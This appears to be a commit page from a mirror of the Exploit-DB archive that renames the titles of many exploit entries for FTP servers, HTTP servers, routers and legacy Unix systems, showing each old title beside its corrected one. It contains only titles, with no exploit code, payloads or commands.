bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2016-09-28

Browse source 
6 new exploits

UUCP Exploit - file creation/overwriting (symlinks)
UUCP Exploit - File Creation/Overwriting (symlinks) Exploit

Serv-U 3.x < 5.x - Privilege Escalation
Serv-U FTP Server 3.x < 5.x - Privilege Escalation

TiTan FTP Server - Long Command Heap Overflow (PoC)
Titan FTP Server - Long Command Heap Overflow (PoC)

Serv-U < 5.2 - Remote Denial of Service
Serv-U FTP Server < 5.2 - Remote Denial of Service

chesapeake tftp server 1.0 - Directory Traversal / Denial of Service (PoC)
Chesapeake TFTP Server 1.0 - Directory Traversal / Denial of Service (PoC)

Serv-U 4.x - 'site chmod' Remote Buffer Overflow
Serv-U FTP Server 4.x - 'site chmod' Remote Buffer Overflow

WS_FTP Server 5.03 - (RNFR) Buffer Overflow
Ipswitch WS_FTP Server 5.03 - (RNFR) Buffer Overflow

TYPSoft FTP Server 1.11 - (RETR) Denial of Service
TYPSoft FTP Server 1.11 - 'RETR' Denial of Service

XM Easy Personal FTP Server 1.0 - (Port) Remote Overflow (PoC)
XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)

XM Easy Personal FTP Server 4.3 - (USER) Remote Buffer Overflow (PoC)
XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)

XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow (PoC)
XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)

WinFtp Server 2.0.2 - (PASV) Remote Denial of Service
WinFTP Server 2.0.2 - (PASV) Remote Denial of Service

DREAM FTP Server 1.0.2 - (PORT) Remote Denial of Service
Dream FTP Server 1.0.2 - (PORT) Remote Denial of Service

XM Easy Personal FTP Server 5.2.1 - (USER) Format String Denial of Service
XM Easy Personal FTP Server 5.2.1 - 'USER' Format String Denial of Service

Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) Denial of Service
Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service

TurboFTP 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service
TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service

XM Easy Personal FTP Server 5.30 - (ABOR) Format String Denial of Service
XM Easy Personal FTP Server 5.30 - 'ABOR' Format String Denial of Service

MiniWeb Http Server 0.8.x - Remote Denial of Service
MiniWeb HTTP Server 0.8.x - Remote Denial of Service

JAF-CMS 4.0 RC2 - Multiple Remote File Inclusion
JAF CMS 4.0 RC2 - Multiple Remote File Inclusion

XM Easy Personal FTP Server 5.4.0 - (XCWD) Denial of Service
XM Easy Personal FTP Server 5.4.0 - 'XCWD' Denial of Service

Belkin wireless G router + ADSL2 modem - Authentication Bypass
Belkin Wireless G router + ADSL2 modem - Authentication Bypass
Serv-U 7.3 - Authenticated (stou con:1) Denial of Service
Serv-U 7.3 - Authenticated Remote FTP File Replacement
Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service
Serv-U FTP Server 7.3 - Authenticated Remote FTP File Replacement

WinFTP 2.3.0 - (PASV mode) Remote Denial of Service
WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service

Titan FTP server 6.26 build 630 - Remote Denial of Service
Titan FTP Server 6.26 build 630 - Remote Denial of Service

Netgear WG102 - Leaks SNMP write Password with read access
Netgear WG102 - Leaks SNMP Write Password With Read Access

WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow
WinFTP Server 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow

Netgear embedded Linux for the SSL312 router - Denial of Service
Netgear SSL312 Router - Denial of Service

Belkin BullDog Plus UPS-Service - Buffer Overflow
Belkin BullDog Plus - UPS-Service Buffer Overflow
Serv-U 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit
Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service
Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit
Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service

XM Easy Personal FTP Server 5.7.0 - (NLST) Denial of Service
XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service

TYPSoft FTP Server 1.11 - (ABORT) Remote Denial of Service
TYPSoft FTP Server 1.11 - 'ABORT' Remote Denial of Service

httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit
httpdx 0.8 FTP Server - Delete/Get/Create Directories/Files Exploit

Firebird SQL - op_connect_request main listener shutdown
Firebird SQL - op_connect_request main listener shutdown Exploit

HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service
BugHunter HTTP Server 1.6.2 - 'httpsv.exe' (GET 404) Remote Denial of Service

XM Easy Personal FTP Server - 'APPE' and 'DELE' Command Denial of Service
XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service

TYPSoft 1.10 - APPE DELE Denial of Service
TYPSoft FTP Server 1.10 - APPE DELE Denial of Service

WingFTP Server 3.2.4 - Cross-Site Request Forgery
Wing FTP Server 3.2.4 - Cross-Site Request Forgery

Quick Player 1.2 -Unicode BoF - bindshell
Quick Player 1.2 - Unicode Buffer Overflow (Bindshell)

UplusFtp Server 1.7.0.12 - Remote Buffer Overflow
UplusFTP Server 1.7.0.12 - Remote Buffer Overflow

Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe
Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow (calc.exe)
Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow
Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)
Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)
EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow
EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)
EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)

Easy~Ftp Server 1.7.0.2 - (HTTP) Remote Buffer Overflow
EasyFTP Server 1.7.0.2 - (HTTP) Remote Buffer Overflow

Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow
EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow

iPhone - FTP Server (WiFi FTP) by SavySoda Denial of Service/PoC
iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service/PoC

TopDownloads MP3 Player 1.0 - '.m3u' crash
TopDownloads MP3 Player 1.0 - '.m3u' Crash Exploit

Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)
EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)
eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC)
eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC)
PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php
eDisplay Personal FTP Server 1.0.0 - Unauthenticated Denial of Service (PoC)
eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crash SEH (PoC)
PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php Exploit

eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)
eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)

uhttp Server - Directory Traversal
uhttp Server 0.1.0-alpha - Directory Traversal

eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)
eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)

Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow
EasyFTP Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow

Apple Safari 4.0.3 (Windows x86) - (Windows x86) CSS Remote Denial of Service
Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service
SmallFTPd FTP Server 1.0.3 - DELE Command Denial of Service
TYPSoft FTP Server 1.10 - RETR Command Denial of Service
SmallFTPd 1.0.3 - DELE Command Denial of Service
TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service

SolarWinds 10.4.0.10 - TFTP Denial of Service
SolarWinds TFTP Server 10.4.0.10 - Denial of Service

e107 - Code Exec
e107 - Code Exection

HomeFTP Server r1.10.3 (build 144) - Denial of Service
Home FTP Server r1.10.3 (build 144) - Denial of Service

TYPSoft FTP Server 1.1 - Remote Denial of Service (APPE)
TYPSoft FTP Server 1.1 - 'APPE' Remote Denial of Service

SolarWinds 10.4.0.13 - Denial of Service
SolarWinds TFTP Server 10.4.0.13 - Denial of Service

ISC-DHCPD - Denial of Service
ISC DHCPD - Denial of Service
Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)
EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)

Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow

deepin tftp server 1.25 - Directory Traversal
Deepin TFTP Server 1.25 - Directory Traversal

Adobe Acrobat Reader and Flash Player - 'newclass' invalid pointer
Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer Exploit

JCMS 2010 - file download
JCMS 2010 - File Download Exploit

SolarFTP 2.0 - Multiple Commands Denial of Service
Solar FTP Server 2.0 - Multiple Commands Denial of Service

TYPSoft FTP Server 1.10 - RETR CMD Denial of Service
TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service

Xynph 1.0 - USER Denial of Service
Xynph FTP Server 1.0 - USER Denial of Service

XM Easy Personal FTP Server 5.8.0 - (TYPE) Denial of Service
XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service

Solar FTP 2.1 - Denial of Service
Solar FTP Server 2.1 - Denial of Service

Red Hat Linux - stickiness of /tmp
Red Hat Linux - stickiness of /tmp Exploit

home ftp server 1.12 - Directory Traversal
Home FTP Server 1.12 - Directory Traversal

NetGear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)
Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)

Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit)

RhinoSoft Serv-U - Session Cookie Buffer Overflow (Metasploit)
RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)

Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow
EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow

SmallFTPd 1.0.3 FTP Server - Denial of Service
SmallFTPd 1.0.3 - Denial of Service

PCMAN FTP Server Buffer Overflow - PUT Command (Metasploit)
PCMan FTP Server Buffer Overflow - PUT Command (Metasploit)

Solar FTP 2.1.1 - PASV Buffer Overflow (PoC)
Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)

BisonFTP Server 3.5 - Remote Buffer Overflow
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow

Solarftp 2.1.2 - PASV Buffer Overflow (Metasploit)
Solar FTP Server 2.1.2 - PASV Buffer Overflow (Metasploit)

BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)

NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery
Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery

zFTP Server - 'cwd/stat' Remote Denial of Service
zFTPServer - 'cwd/stat' Remote Denial of Service

Serv-U FTP - Jail Break
Serv-U FTP Server - Jail Break

Typsoft FTP Server 1.10 - Multiple Commands Denial of Service
TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service

PeerBlock 1.1 - BSOD
PeerBlock 1.1 - BSOD Exploit

distinct tftp server 3.01 - Directory Traversal
Distinct TFTP Server 3.01 - Directory Traversal

PHP < 5.3.12 & < 5.4.2 - CGI Argument Injection
PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection

Berkeley Sendmail 5.58 - DEBUG
Berkeley Sendmail 5.58 - Debug exploit
SunView (SunOS 4.1.1) - selection_svc
Digital Ultrix 4.0/4.1 - /usr/bin/chroot
SunOS 4.1.1 - /usr/release/bin/makeinstall
SunOS 4.1.1 - /usr/release/bin/winstall
SunView (SunOS 4.1.1) - selection_svc Exploit
Digital Ultrix 4.0/4.1 - /usr/bin/chroot Exploit
SunOS 4.1.1 - /usr/release/bin/makeinstall Exploit
SunOS 4.1.1 - /usr/release/bin/winstall Exploit

SunOS 4.1.3 - kmem setgid /etc/crash
SunOS 4.1.3 - kmem setgid /etc/crash Exploit

IRIX 6.4 - pfdisplay.cgi
IRIX 6.4 - 'pfdisplay.cgi' Exploit
SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE
SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT
SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE Exploit
SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT Exploit

FreePBX < 13.0.188 - Remote Command Execution (Metasploit)

HP JetAdmin 1.0.9 Rev. D - symlink
HP JetAdmin 1.0.9 Rev. D - symlink Exploit

Ipswitch IMail 5.0 / WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation
Ipswitch IMail 5.0 / Ipswitch WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation

TP-Link Archer CR-700 - Cross-Site Scripting

BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin
BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin Exploit
Cat Soft Serv-U 2.5 - Buffer Overflow
BisonWare BisonWare FTP Server 3.5 - Multiple Vulnerabilities
Allaire ColdFusion Server 4.0.1 - CFCRYPT.EXE
Cat Soft Serv-U FTP Server 2.5 - Buffer Overflow
BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Exploit

Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA
Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA Exploit

Linux Kernel 2.0 / 2.1 / 2.2 - autofs
Linux Kernel 2.0 / 2.1 / 2.2 - autofs Exploit
Debian 2.1 - httpd
S.u.S.E. 5.2 - gnuplot
Debian 2.1 - httpd Exploit
S.u.S.E. Linux 5.2 - gnuplot Exploit

Stanford University bootpd 2.4.3 / Debian 2.0 - netstd
Stanford University bootpd 2.4.3 / Debian 2.0 - netstd Exploit

SGI IRIX 6.2 - /usr/lib/netaddpr
SGI IRIX 6.2 - /usr/lib/netaddpr Exploit

SGI IRIX 6.2 - day5notifier
SGI IRIX 6.2 - day5notifier Exploit

SGI IRIX 6.4 - datman/cdman
SGI IRIX 6.4 - datman/cdman Exploit

RedHat Linux 2.1 - abuse.console
RedHat Linux 2.1 - abuse.console Exploit

SGI IRIX 6.3 - cgi-bin webdist.cgi
SGI IRIX 6.3 - cgi-bin webdist.cgi Exploit

SGI IRIX 6.4 - cgi-bin handler
SGI IRIX 6.4 - cgi-bin handler Exploit

SGI IRIX 6.4 - login
SGI IRIX 6.4 - login Exploit

IBM AIX 3.2.5 - IFS
IBM AIX 3.2.5 - IFS Exploit

IBM AIX 3.2.5 - login(1)
IBM AIX 3.2.5 - login(1) Exploit
Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (1)
Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (2)
Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS Exploit (1)
Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS Exploit (2)

Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP
Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP Exploit

GNU glibc 2.1/2.1.1 -6 - pt_chown
GNU glibc 2.1/2.1.1 -6 - pt_chown Exploit

Common Desktop Environment 2.1 20 / Solaris 7.0 - dtspcd
Common Desktop Environment 2.1 20 / Solaris 7.0 - dtspcd Exploit

ProFTPd 1.2 pre6 - snprintf
ProFTPd 1.2 pre6 - snprintf Exploit

Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi
Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi Exploit

Microsoft Internet Explorer 5.0/4.0.1 - IFRAME
Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit
UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)
UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)
PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog
UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (1)
UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (2)
PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog Exploit

S.u.S.E. Linux 6.1/6.2 - cwdtools
S.u.S.E. Linux 6.1/6.2 - cwdtools Exploit

SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin'
SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin' Exploit

SCO Unixware 7.1 - 'pkg' commands
SCO Unixware 7.1 - 'pkg' command Exploit

Cat Soft Serv-U 2.5a - Server SITE PASS Denial of Service
Cat Soft Serv-U FTP Server 2.5a - SITE PASS Denial of Service

Nortel Networks Optivity NETarchitect 2.0 - PATH
Nortel Networks Optivity NETarchitect 2.0 - PATH Exploit

SGI IRIX 6.2 - midikeys/soundplayer
SGI IRIX 6.2 - midikeys/soundplayer Exploit

Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE
Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Exploit

Cat Soft Serv-U 2.5/a/b / Windows 2000/95/98/NT 4.0 - Shortcut
Cat Soft Serv-U FTP Server 2.5/a/b (Windows 2000/95/98/NT 4.0) - Shortcut Exploit

Microsoft Windows 95/98/NT 4.0 - autorun.inf
Microsoft Windows 95/98/NT 4.0 - autorun.inf Exploit
Corel Linux OS 1.0 - buildxconfig
Corel Linux OS 1.0 - setxconf
Corel Linux OS 1.0 - buildxconfig Exploit
Corel Linux OS 1.0 - setxconf Exploit

TP Link Gateway 3.12.4 - Multiple Vulnerabilities
TP-Link Gateway 3.12.4 - Multiple Vulnerabilities

SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname
SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname Exploit

Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)
Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr Exploit (2)
Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel (1)
Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel (2)
Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - kreatecd
Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel  Exploit (1)
Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel  Exploit (2)
Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - kreatecd Exploit

Cisco IOS 11.x/12.x - HTTP %%
Cisco IOS 11.x/12.x - HTTP %% Exploit

RedHat Linux 6.0/6.1/6.2 - pam_console
RedHat Linux 6.0/6.1/6.2 - pam_console Exploit

HP-UX 10.20/11.0 man - /tmp symlink
HP-UX 10.20/11.0 man - /tmp Symlink Exploit

IRIX 5.3/6.x - mail
IRIX 5.3/6.x - mail Exploit

TYPSoft 0.7 x - FTP Server Remote Denial of Service
TYPSoft FTP Server 0.7.x - FTP Server Remote Denial of Service

Oracle Internet Directory 2.0.6 - oidldap
Oracle Internet Directory 2.0.6 - oidldap Exploit

CatSoft FTP Serv-U 2.5.x - Brute Force
Cat Soft Serv-U FTP Server 2.5.x - Brute Force

Small HTTP server 2.0 1 - Non-Existent File Denial of Service
Small HTTP Server 2.0 1 - Non-Existent File Denial of Service

NCSA httpd-campas 1.2 - sample script
NCSA httpd-campas 1.2 - sample script Exploit

Novell NetWare Web Server 2.x - convert.bas
Novell NetWare Web Server 2.x - convert.bas Exploit

Serv-U 2.4/2.5 - FTP Directory Traversal
Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal

Novell Netware Web Server 3.x - files.pl
Novell Netware Web Server 3.x - files.pl Exploit

guido frassetto sedum http server 2.0 - Directory Traversal
Guido Frassetto SEDUM HTTP Server 2.0 - Directory Traversal

robin twombly a1 http server 1.0 - Directory Traversal
Robin Twombly A1 HTTP Server 1.0 - Directory Traversal

SGI IRIX 3/4/5/6 / OpenLinux 1.0/1.1 - routed traceon
SGI IRIX 3/4/5/6 / OpenLinux 1.0/1.1 - routed traceon Exploit

michael lamont savant http server 2.1 - Directory Traversal
Michael Lamont Savant HTTP Server 2.1 - Directory Traversal
zeroo http server 1.5 - Directory Traversal (1)
zeroo http server 1.5 - Directory Traversal (2)
Zeroo HTTP Server 1.5 - Directory Traversal (1)
Zeroo HTTP Server 1.5 - Directory Traversal (2)

Netgear 1.x - ProSafe VPN Firewall Web Interface Login Denial of Service
Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service

Centrinity FirstClass 5.50/5.77/7.0/7.1 - HTTP Server Long Version Field Denial of Service
Centrinity FirstClass HTTP Server 5.50/5.77/7.0/7.1 - Long Version Field Denial of Service

Centrinity FirstClass 7.1 - HTTP Server Directory Disclosure
Centrinity FirstClass HTTP Server 7.1 -  Directory Disclosure

BRS Webweaver 1.0.7 - ISAPISkeleton.dll Cross-Site Scripting
BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting

XLight FTP Server 1.x - Long Directory Request Remote Denial of Service
Xlight FTP Server 1.x - Long Directory Request Remote Denial of Service

XLight FTP Server 1.52 - Remote Send File Request Denial of Service
Xlight FTP Server 1.52 - Remote Send File Request Denial of Service

gweb http server 0.5/0.6 - Directory Traversal
GWeb HTTP Server 0.5/0.6 - Directory Traversal

MiniWeb MiniWeb HTTP Server (build 300) - Crash (PoC)
MiniWeb HTTP Server (build 300) - Crash (PoC)

TP-Link Print Server TL PS110U - Sensitive Information Enumeration
TP-Link PS110U  Print Server TL - Sensitive Information Enumeration

PCMan's FTP Server 2.0.7 - Buffer Overflow
PCMan FTP Server 2.0.7 - Buffer Overflow

PCMan's FTP Server 2.0 - Remote Buffer Overflow
PCMan FTP Server 2.0 - Remote Buffer Overflow

PHP 3-5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass
PHP 3 < 5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass

PHP 3-5 - ZendEngine ECalloc Integer Overflow
PHP 3 < 5 - ZendEngine ECalloc Integer Overflow

NetGear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow
Netgear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow

NetGear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow
Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow
TPLINK WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities
Static Http Server 1.0 - Denial of Service
TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities
Static HTTP Server 1.0 - Denial of Service

NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)
Netgear ReadyNAS - Perl Code Evaluation (Metasploit)

NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting
Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting

NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities
Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities
vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (1)
vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (2)
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)

Ipswitch 8.0 - WS_FTP Client Format String
Ipswitch WS_FTP Home/Professional 8.0 - WS_FTP Client Format String

NETGEAR WGR614 - Administration Interface Remote Denial of Service
Netgear WGR614 - Administration Interface Remote Denial of Service

Cisco IOS 12.4(23) HTTP Server - Multiple Cross-Site Scripting Vulnerabilities
Cisco IOS 12.4(23) - HTTP Server Multiple Cross-Site Scripting Vulnerabilities

NETGEAR N600 WIRELESS DUAL BAND WNDR3400 - Multiple Vulnerabilities
Netgear N600 Wireless Dual Band WNDR3400 - Multiple Vulnerabilities

NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting
Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting

NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure
Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure
TP-Link Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities
TP-Link Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities
TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities
TP-Link TL-WR841N / TL-WR841ND - Multiple Vulnerabilities

SolarFTP 2.1.1 - 'PASV' Command Remote Buffer Overflow
Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow

Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit
Netgear WNR500  Wireless Router - Parameter Traversal Arbitrary File Access Exploit

NetMan 204 - Backdoor Account

NetGear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities
Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities

Serv-U 11.1.0.3 - Denial of Service / Security Bypass
Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass

TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change
TP-Link TD-W8950ND ADSL2+ - Unauthenticated Remote DNS Change
NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure
ISC BIND9 - TKEY (PoC)
Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure
ISC BIND 9 - TKEY (PoC)

ISC BIND9 - TKEY Remote Denial of Service (PoC)
ISC BIND 9 - TKEY Remote Denial of Service (PoC)

NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation
Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation

Android (Stagefright) - Remote Code Execution
Android - 'Stagefright' Remote Code Execution

Microsoft Windows Media Center - MCL (MS15-100)
Microsoft Windows Media Center - MCL Exploit (MS15-100)

Android libstagefright - Integer Overflow Remote Code Execution
Android - libstagefright Integer Overflow Remote Code Execution

NETGEAR D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution
Netgear D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution

pdfium IsFlagSet (v8 memory management) - SIGSEGV
pdfium IsFlagSet (v8 memory management) - SIGSEGV Exploit

NETGEAR ProSafe Network Management System NMS300 - Multiple Vulnerabilities
Netgear ProSafe Network Management System NMS300 - Multiple Vulnerabilities

XM Easy Personal FTP Server 5.8 - (HELP) Remote Denial of Service
XM Easy Personal FTP Server 5.8.0 - 'HELP' Remote Denial of Service

NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)
Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)

TallSoft SNMP TFTP Server 1.0.0 - Denial of Service
TallSoft SNMP/TFTP Server 1.0.0 - Denial of Service

Metaphor - Stagefright Exploit with ASLR Bypass
Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)

Zabbix 2.2 < 3.0.3 - Remote Code Execution with API JSON-RPC
